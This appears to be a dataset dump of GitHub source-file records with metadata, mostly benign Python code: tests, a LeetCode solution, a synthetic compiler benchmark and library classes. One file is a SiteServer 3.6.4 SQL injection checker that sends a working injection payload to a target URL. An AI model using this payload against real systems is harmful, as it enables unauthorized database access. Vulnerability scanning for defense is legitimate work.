blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bbb837d0aac28477a37baa05d3dd3c36167bc5b7 | 8b59108f621e94935b3b72aae3c441e10cb64a1c | /create_uneeded_icons.py | cdb3dda6906313546c12ebd032e4aa2accfd9755 | []
| no_license | CyberSys/CE_Python | 97a373b1fe2d214ae854d454dc5e7d79bc150d8e | 721ac005e215f1225fb3c99491b55dc48b19ab30 | refs/heads/master | 2022-01-13T08:04:08.558594 | 2019-07-22T17:05:46 | 2019-07-22T17:05:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,542 | py | from shutil import copyfile
import os
if __name__ == "__main__":
uneeded_icons = [
"AssaultScope_48.png",
"ATButtstockTS_48.png",
"ATFrontsightTS_48.png",
"ATHandguardARS_48.png",
"ExtendedClip_48.png",
"FlashlightAcc_48.png",
"Ironsight_48.png",
"NewSilencer_48.png",
"NoAttachmentBarrel_48.png",
"NoAttachmentBottom_48.png",
"Scope12x_48.png",
"ammo_12_gauge_pellet_48.png",
"ammo_12_gauge_slug_48.png",
"ammo_22_48.png",
"ammo_223_48.png",
"ammo_308_48.png",
"ammo_357_48.png",
"ammo_5_56x45_48.png",
"ammo_7_62x51_48.png",
"ammo_9mm_48.png",
"ammo_acp_45_48.png",
"Arrow_0000_48.png",
"Arrow_000P_48.png",
"Arrow_00R0_48.png",
"Arrow_00RP_48.png",
"Arrow_0B00_48.png",
"Arrow_0B0P_48.png",
"Arrow_0BR0_48.png",
"Arrow_0BRP_48.png",
"Arrow_F000_48.png",
"Bolt_0000_48.png",
"Bolt_000P_48.png",
"Bolt_00R0_48.png",
"Bolt_00RP_48.png",
"Bolt_0B00_48.png",
"Bolt_0B0P_48.png",
"Bolt_0BR0_48.png",
"Bolt_0BRP_48.png",
"Bolt_F000_48.png",
"ChemlightBlue_48.png",
"ChemlightGreen_48.png",
"ChemlightRed_48.png",
"ChemlightWhite_48.png",
"ChemlightYellow_48.png",
"Flare_48",
"Flashbang_48.png",
"GrenadeBottle_48.png",
"GrenadeMolotov_48.png",
"GrenadeSmokeGreen_48.png",
"GrenadeSmokeMagenta_48.png",
"GrenadeSmokeRed_48.png",
"GrenadeSmokeWhite_48.png",
"GrenadeSmokeYellow_48.png",
"Pipebomb_48.png",
"animated_search_light_48.png",
"entity_test_48.png",
"entity_test_packed_48.png",
"PlotSign_48.png",
"powered_flood_light_48.png",
"tire_single_48.png",
"DieselGenerator_48.png",
"WaterPurifictionTablets_48.png",
"CampingTentBlue_48.png",
"CampingTentBrown_48.png",
"CampingTentGreen_48.png",
"CampingTentOrange_48.png",
"CampingTentPurple_48.png",
"CampingTentRed_48.png",
"CampingTentYellow_48.png",
"PackedCampingTent_48.png",
"PackedTrekkingTent_48.png",
"PupTentBlue_48.png",
"PupTentBrown_48.png",
"PupTentGreen_48.png",
"PupTentRed_48.png",
"PupTentTan_48.png",
"TrekkingTentBlue_48.png",
"TrekkingTentBrown_48.png",
"TrekkingTentGreen_48.png",
"TrekkingTentOrange_48.png",
"TrekkingTentPurple_48.png",
"TrekkingTentRed_48.png",
"TrekkingTentYellow_48.png",
"TwoPersonTentBlue_48.png",
"TwoPersonTentBrown_48.png",
"TwoPersonTentGreen_48.png",
"TwoPersonTentOrange_48.png",
"TwoPersonTentPurple_48.png",
"TwoPersonTentRed_48.png",
"TwoPersonTentYellow_48.png",
"FlashbangPickup_48.png",
"Binoculars_48.png",
"DebugPistol_48.png",
"NoWeapon_48.png",
"PickAndThrowWeapon_48.png",
]
for x in uneeded_icons:
copyfile(
os.path.normpath(
"D:/perforce/dev/GameSDK/Libs/UI/Inventory/item_images/no_icon_48.png"
),
os.path.join("D:/perforce/dev/GameSDK/Libs/UI/Inventory/item_images", x),
)
| [
"[email protected]"
]
| |
634db64fad5672d244b9dde45ed05c57dca1210d | a1b21aa9b4c3b99b9b16fd47686bcc76e6fafd18 | /unit_test/function_test/test_name_function.py | 9852039917d53af0689e6cada925c25852cced60 | []
| no_license | irfan87/python_tutorial | 986c5dae98a5ad928c3820bf0355f544c091caf0 | 71bbf8b8aba2d5a1fafc56b8cb15d471c428a0cf | refs/heads/master | 2020-06-05T00:52:07.619489 | 2019-08-19T02:56:41 | 2019-08-19T02:56:41 | 192,257,432 | 0 | 0 | null | 2019-08-19T02:56:42 | 2019-06-17T01:53:46 | Python | UTF-8 | Python | false | false | 643 | py | import unittest
from name_function import get_formatted_name
class NamesTestCase(unittest.TestCase):
"""Tests for 'name_function.py"""
def test_first_last_name(self):
"""Do names like 'Janis Joplin' work?"""
formatted_name = get_formatted_name('janis', 'joplin')
self.assertEqual(formatted_name, 'Janis Joplin')
def test_first_last_middle_name(self):
"""Do names like 'Wolfgang Amadeus Mozart' work?"""
formatted_name = get_formatted_name('wolfgang', 'mozart', 'amadeus')
self.assertEqual(formatted_name, 'Wolfgang Amadeus Mozart')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
]
| |
ed7aeccf50b61c1ede46b34c971ecbf6fac49f40 | 90baf1f6abb0dcba147f46105347a7d81f0ed617 | /472-concatenated-words/472-concatenated-words.py | 1541cd05cdd590100ef56d987a207bccb9cf9176 | []
| no_license | vinija/LeetCode | c2bfbd78711b2ebedcfd4f834d12fde56a15b460 | de2727f1cc52ce08a06d63cff77b6ef6bb9d2528 | refs/heads/master | 2022-09-29T06:16:44.465457 | 2022-08-21T05:20:45 | 2022-08-21T05:20:45 | 97,401,204 | 116 | 32 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | # ORIGINAL POST WITH EXPLANATION: https://leetcode.com/problems/concatenated-words/discuss/871866/Easyway-Explanation-every-step
class Solution(object):
def findAllConcatenatedWordsInADict(self, words):
"""
:type words: List[str]
:rtype: List[str]
"""
d = set(words)
def dfs(word):
for i in range(1, len(word)):
prefix = word[:i]
suffix = word[i:]
if prefix in d and suffix in d:
return True
if prefix in d and dfs(suffix):
return True
return False
res = []
for word in words:
if dfs(word):
res.append(word)
return res | [
"[email protected]"
]
| |
b1c6ea574c79b9969846989153c8237e1508baf1 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/tree-big-622.py | e0c3373dd20ce956070551e9031ef9fac32135c3 | []
| no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,286 | py | # Binary-search trees
class TreeNode(object):
value:int = 0
left:"TreeNode" = None
right:"TreeNode" = None
def insert(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode(x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode(x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode2(object):
value:int = 0
value2:int = 0
left:"TreeNode2" = None
left2:"TreeNode2" = None
right:"TreeNode2" = None
right2:"TreeNode2" = None
def insert(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode2(x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if $Member is None:
self.right = makeNode2(x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode2", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode2", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode3(object):
value:int = 0
value2:int = 0
value3:int = 0
left:"TreeNode3" = None
left2:"TreeNode3" = None
left3:"TreeNode3" = None
right:"TreeNode3" = None
right2:"TreeNode3" = None
right3:"TreeNode3" = None
def insert(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode3(x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode3(x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode3", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode3", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode3", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode4(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
left:"TreeNode4" = None
left2:"TreeNode4" = None
left3:"TreeNode4" = None
left4:"TreeNode4" = None
right:"TreeNode4" = None
right2:"TreeNode4" = None
right3:"TreeNode4" = None
right4:"TreeNode4" = None
def insert(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode4(x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode4(x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode4", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode4", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode4", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode4", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class TreeNode5(object):
value:int = 0
value2:int = 0
value3:int = 0
value4:int = 0
value5:int = 0
left:"TreeNode5" = None
left2:"TreeNode5" = None
left3:"TreeNode5" = None
left4:"TreeNode5" = None
left5:"TreeNode5" = None
right:"TreeNode5" = None
right2:"TreeNode5" = None
right3:"TreeNode5" = None
right4:"TreeNode5" = None
right5:"TreeNode5" = None
def insert(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def insert5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
self.left = makeNode5(x, x, x, x, x)
return True
else:
return self.left.insert(x)
elif x > self.value:
if self.right is None:
self.right = makeNode5(x, x, x, x, x)
return True
else:
return self.right.insert(x)
return False
def contains(self:"TreeNode5", x:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains2(self:"TreeNode5", x:int, x2:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains3(self:"TreeNode5", x:int, x2:int, x3:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains4(self:"TreeNode5", x:int, x2:int, x3:int, x4:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
def contains5(self:"TreeNode5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if x < self.value:
if self.left is None:
return False
else:
return self.left.contains(x)
elif x > self.value:
if self.right is None:
return False
else:
return self.right.contains(x)
else:
return True
class Tree(object):
root:TreeNode = None
size:int = 0
def insert(self:"Tree", x:int) -> object:
if self.root is None:
self.root = makeNode(x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree2(object):
root:TreeNode2 = None
root2:TreeNode2 = None
size:int = 0
size2:int = 0
def insert(self:"Tree2", x:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree2", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode2(x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree2", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree2", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree3(object):
root:TreeNode3 = None
root2:TreeNode3 = None
root3:TreeNode3 = None
size:int = 0
size2:int = 0
size3:int = 0
def insert(self:"Tree3", x:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree3", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree3", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode3(x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree3", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree3", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree3", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree4(object):
root:TreeNode4 = None
root2:TreeNode4 = None
root3:TreeNode4 = None
root4:TreeNode4 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
def insert(self:"Tree4", x:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree4", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree4", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode4(x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree4", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree4", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree4", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree4", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
class Tree5(object):
root:TreeNode5 = None
root2:TreeNode5 = None
root3:TreeNode5 = None
root4:TreeNode5 = None
root5:TreeNode5 = None
size:int = 0
size2:int = 0
size3:int = 0
size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
| [
"[email protected]"
]
| |
f170105dd4df1fcc7753415af3c4715d042cf732 | 9c38f3a354844f5080632005630d249d6487ebb3 | /python_compiler/lexer/submitted/test.512.py | ba4d1189a78cf314b7ee04b45c551fcd673df06e | []
| no_license | keithroe/keithscode | ee7247ad6bdd844279f29a56718992cb886f9215 | 470c6b833b9b8bc2c78d1b43aac896b0ce9c9a7c | refs/heads/master | 2021-01-10T08:48:12.729594 | 2018-10-16T17:48:31 | 2018-10-16T17:48:31 | 51,531,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12 | py | r = 5 \
+ 4 | [
"keithroe@cba41313-dcc7-113d-0d3d-2a2d30939b49"
]
| keithroe@cba41313-dcc7-113d-0d3d-2a2d30939b49 |
09350b78ae65b299217cbd7c1567d5543b66ea37 | 37a119f116431ef91f1257370a5cd4a992b018db | /tests/sql/test_expressions.py | 123319ebd94792d6d470655ae8be31eb2e22416f | [
"ISC"
]
| permissive | uranusjr/sqlian | 660e66d4c5c01b1112961f4097e95143c15cf72a | 8f029e91af032e23ebb95cb599aa7267ebe75e05 | refs/heads/master | 2021-01-19T18:59:19.349318 | 2017-09-12T13:12:10 | 2017-09-12T13:12:10 | 101,176,270 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 903 | py | from sqlian import Sql
from sqlian.standard import expressions as e
def test_identifier(engine):
sql = e.Identifier('foo')
assert sql.__sql__(engine) == Sql('"foo"'), sql
def test_identifier_qualified(engine):
sql = e.Identifier('foo', 'bar')
assert sql.__sql__(engine) == Sql('"foo"."bar"'), sql
def test_is_null(engine):
sql = e.Equal(e.Identifier('foo'), None)
assert sql.__sql__(engine) == Sql('"foo" IS NULL'), sql
def test_is_not_null(engine):
sql = e.NotEqual(e.Identifier('foo'), None)
assert sql.__sql__(engine) == Sql('"foo" IS NOT NULL'), sql
def test_equal(engine):
sql = e.Equal(e.Identifier('foo', 'bar'), 42)
assert sql.__sql__(engine) == Sql('"foo"."bar" = 42'), sql
def test_not_equal(engine):
sql = e.NotEqual(e.Identifier('person', 'name'), 'Mosky')
assert sql.__sql__(engine) == Sql('"person"."name" != ' + "'Mosky'"), sql
| [
"[email protected]"
]
| |
dd773633d85d0d1d73c0a0a758c4bdebd3107be2 | 6f7ba68d9e2ba6cfc7f07367bcd34a643f863044 | /cms/siteserver/siteserver_background_keywordsFilting_sqli.py | 24feed6f2a0c31d35687f1091c3bcc6d3214f82b | []
| no_license | deepwebhacker/Dxscan | 2e803ee01005a1d0a7802290bfb553f99e8fcf2e | eace0872e1deb66d53ec7cfc62f4c793f9421901 | refs/heads/main | 2023-03-06T10:26:23.371926 | 2021-02-22T14:03:51 | 2021-02-22T14:03:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,719 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: siteserver3.6.4 background_keywordsFilting.aspx注入
referer: http://www.wooyun.org/bugs/wooyun-2013-043641
author: Lucifer
description: 文件/siteserver/bbs/background_keywordsFilting.aspx中,参数Keyword存在SQL注入。
'''
import sys
import requests
import warnings
from termcolor import cprint
class siteserver_background_keywordsFilting_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>0--"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"BBBMicrosoft" in req.text:
cprint("[+]存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
postdata = {self.url:"存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl}
requests.post('http://localhost:8848/cms', json=postdata)
else:
cprint("[-]不存在siteserver_background_keywordsFilting_sqli漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = siteserver_background_keywordsFilting_sqli_BaseVerify(sys.argv[1])
testVuln.run()
| [
"[email protected]"
]
| |
98a9f68c969ed0299834aeafe3f5422274954ce7 | 8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f | /src/pycrunchbase/resource/news.py | 67242ca520fe227c4dc5b1285fa4919f577e6495 | [
"MIT"
]
| permissive | ngzhian/pycrunchbase | 58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808 | ead7c93a51907141d687da02864a3803d1876499 | refs/heads/master | 2023-07-08T06:18:59.314695 | 2023-07-03T13:27:06 | 2023-07-03T13:27:06 | 30,629,033 | 69 | 45 | MIT | 2020-12-02T02:26:40 | 2015-02-11T03:39:14 | Python | UTF-8 | Python | false | false | 734 | py | import six
from .node import Node
from .utils import parse_date
@six.python_2_unicode_compatible
class News(Node):
"""Represents a News on CrunchBase"""
KNOWN_PROPERTIES = [
"title",
"author",
"posted_on",
"url",
"created_at",
"updated_at",
]
def _coerce_values(self):
for attr in ['posted_on']:
if getattr(self, attr, None):
setattr(self, attr, parse_date(getattr(self, attr)))
def __str__(self):
return u'{title} by {author} on {posted_on}'.format(
title=self.title,
author=self.author,
posted_on=self.posted_on,
)
def __repr__(self):
return self.__str__()
| [
"[email protected]"
]
| |
9102954aee63aa1de8128785de2d2f9e90d976f9 | a79cccacfa422012caac481b5eff80f6e911d0af | /jax/experimental/gda_serialization/serialization_test.py | cef36c9f56c1553a70bcf8e80935396e0bf0d8b0 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
]
| permissive | jblespiau/jax | f932fe6df23942756957db61655f6cc9c6d67d64 | 46a666c4489b9e04d2777cf2156453bc48a8e432 | refs/heads/main | 2022-04-17T01:50:55.041057 | 2022-04-15T08:49:52 | 2022-04-15T08:49:52 | 481,888,965 | 0 | 0 | Apache-2.0 | 2022-04-15T08:20:44 | 2022-04-15T08:20:43 | null | UTF-8 | Python | false | false | 6,163 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for serialization and deserialization of GDA."""
import pathlib
import unittest
from absl.testing import absltest
import jax
from jax._src import test_util as jtu
from jax._src import util
from jax.config import config
from jax.experimental import PartitionSpec as P
from jax.experimental.global_device_array import GlobalDeviceArray
from jax.experimental.gda_serialization import serialization
from jax.experimental.maps import Mesh
import numpy as np
config.parse_flags_with_absl()
def create_global_mesh(mesh_shape, axis_names):
size = util.prod(mesh_shape)
if len(jax.devices()) < size:
raise unittest.SkipTest(f'Test requires {size} local devices')
mesh_devices = np.array(jax.devices()[:size]).reshape(mesh_shape)
